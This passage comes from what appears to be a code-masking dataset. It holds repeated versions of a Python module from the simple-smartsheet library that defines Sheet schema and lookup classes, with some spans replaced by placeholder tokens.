title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be 